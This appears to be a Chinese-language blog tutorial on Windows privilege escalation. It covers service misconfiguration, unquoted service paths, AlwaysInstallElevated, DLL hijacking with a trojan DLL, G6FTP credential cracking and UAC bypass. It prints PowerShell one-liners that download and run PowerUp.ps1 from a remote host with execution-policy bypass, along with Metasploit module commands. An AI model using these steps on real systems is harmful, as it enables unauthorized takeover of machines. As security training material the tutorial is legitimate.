20 windows提权 02
windows系统权限配置错误提权
有时候windows系统会允许低权限用户配置高权限的服务或者软件
我们可以通过PrivescCheck.ps1脚本进行检测
若是能够成功设置文件
我们可以重新设置文件的地址为我们的msf后门文件
再重新启动,就可以拿到更高的权限
不带引号的服务路劲提权
当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则
系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到
的空格分隔的服务路径的第一个实例。
用PowerUp.ps1或者命令遍历出带有空格的文件路径
powershell-nop-execbypass-c"IEX(New-Object
Net.WebClient).DownloadString('http://192.168.0.106/PowerUp.ps1');Invoke-
AllChecks"
wmicservicegetname,displayname,pathname,startmode|findstr/i"Auto"|findstr
/i/v"C:Windows"|findstr/i/v"""
若是服务器存在空格,路劲可写,则存在漏洞
注册键AlwaysInstallElevated提权
允许低权限用户以System权限安装文件。
不过一般这个漏洞很难碰到,配置这个设置需要用到管理员权限
只要用户没有打开windows installer特权安装功能就问题不大
/cPowerShell-nop-execbypassIEX(New-Object
Net.WebClient).DownloadString('http://192.168.0.121/PowerUp.ps1');Get-
RegAlwaysInstallElevated
返回true 则证明可以利用
利用一个COMahawk64.exe脚本即可获取一个账号密码
本地dll文件劫持
程序运行一般会加载系统dll或本身程序自带的dll,如果我们将程序执行时需要加载的dll文件替换成木马
程序,那么我们下次在启动程序时所加载的dll就是我们替换的那个木马程序了。
攻击过程:收集进程加载的dll-制作dll木马并上传-替换dll-启动应用后成功
G6FTP提权
G6ftp默认端口8021
默认是不对外开放的,这里要用lcx做一个本地的端口转发
首先我们查看G6ftp的配置文件
读取散列数据放到cmd5上去碰撞
若是读到数据后我们则可以用这个账号和密码去进行登录
我们可以有一定的权限去读写
这里就要利用到前面的一些提权方式
写到有权限的目录下,然后自动执行
不过好像没啥用
最大的用处其实是利用该软件执行命令
但是现在好像普遍命令都无法被执行
绕过uac bypassuac
UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户
确认是否授权当前可执行文件来达到阻止恶意程序的目的。
为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行弹窗直接运行
执行文件)
这里主要用到msf上这样的一个模块
useexploit/windows/local/bypassuac_injection
setsession1
run
这里或许还要做一个进程的迁移才能够做一个读取

浙公网安备 33010602011771号